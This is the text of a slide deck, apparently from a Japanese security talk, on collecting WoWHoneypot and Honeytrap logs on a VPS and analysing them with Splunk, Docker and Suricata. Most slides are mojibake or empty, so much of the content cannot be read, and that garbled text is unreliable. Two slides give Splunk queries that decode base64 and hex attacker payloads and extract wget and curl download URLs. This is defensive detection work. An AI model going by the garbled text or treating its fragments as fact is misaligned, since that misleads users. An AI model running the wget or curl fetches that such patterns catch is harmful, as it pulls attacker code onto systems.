Slide 1

Slide 1 text

5   SPLUNK  SEC-CHICK

Slide 2

Slide 2 text

WHO AM I •  sec-chick@one_sec_chick (('/+#!/) •  )/ ,-$  PSOC&-% • 2 ('/+#% (WoW Honeypot, Honeytrap)  0".*/1

Slide 3

Slide 3 text



Slide 4

Slide 4 text

 Splunk (  ) WoWHoneypot Honeytrap PC  VPS SSH • Splunk

Slide 5

Slide 5 text

SPLUNK • Splunk<(159$= 16%;'49&;/ .+-8;$ ,;*!9,+$()0-"# • IT!905!29-6 7*!3 :   > http://www.intellilink.co.jp/pd/products/package/security/splunk.html

Slide 6

Slide 6 text

   • WoWHoneypot

Slide 7

Slide 7 text

   • Honeytrap

Slide 8

Slide 8 text

  8 9 1. SSH)71!&+*57%45' ,#6570 2. Splunk)71,#65705'  3. Splunk5' )7- 4. 37/  5. 2"570 .(70 82"570HEX$6(709

Slide 9

Slide 9 text

  Attack_connection.local_port    10

Slide 10

Slide 10 text

 Attack_connection.payload.data_hex  Hex  →    

Slide 11

Slide 11 text

     

Slide 12

Slide 12 text

  1.  Docker 2.    3. Splunk  4. Suricata 

Slide 13

Slide 13 text

/.10,-%DOCKER • /.10,-&$ $!"' * ( #)  + $* (Docker+ • $ Docker+→% $

Slide 14

Slide 14 text

%"-+( • .# Docker  %"-+(  • %"-+(cron$,* Splunk WoWHoneypot Honeytrap !/&0)'( VPS Honeypot.#   Docker  

Slide 15

Slide 15 text

 Splunk WoWHoneypot Honeytrap   VPS Honeypot  Docker 

Slide 16

Slide 16 text

SPLUNK+;N?  • 0 '!0.*Splunk+;N? 1  • @:NB+2EJ9N

Slide 17

Slide 17 text

WOWHONEYPOT |rex field=_raw "¥"(?[^¥s]+)¥s(?[^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s(? .*$)" | decrypt field="base64_wow" atob emit('base64_wow_decrypted’) |eval decode=urldecode(base64_wow_decrypted) | rex field="decode" "wget.+(?https?://[¥w/:¥.¥-]+?)¥s"| rex field="decode" "curl.+(?https?://[¥w/:¥.¥-]+?)¥s"

Slide 18

Slide 18 text

HONEYTRAP | decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted') | rex field="attack_connection.payload.data_decrypted" "wget.+(?https?://[¥w/:¥.¥-]+?)¥s" | rex field="attack_connection.payload.data_decrypted" "curl.+(?https?://[¥w/:¥.¥-]+?)¥s" |

Slide 19

Slide 19 text

HONEYTRAP

Slide 20

Slide 20 text

SURICATA4  • Grep05%72# 9),#1 #  • ;=:><05"68+* 525 /#2# →  ./ • Suricata3)#),7 !1$/'-(#??

Slide 21

Slide 21 text

 "!-,1.)(1 • @Sec_S_Owl # • @cactus_pots # • @SugitaMuchi # • @soji256 • @morihi_soc # -,1.)+  !Twitter-)'0(% #-,1.)+ Slack!&/0,*$ !   2 http://goo.gl/8bLkZA

Slide 22

Slide 22 text

  #  

Slide 23

Slide 23 text

/)0 • Splunk(,A@CB>?, +&' • (5)"6-*5. $2%4+;C= 7$  + 7!54+%5") • #81A@CB>?7$'7<:9$'/$3DD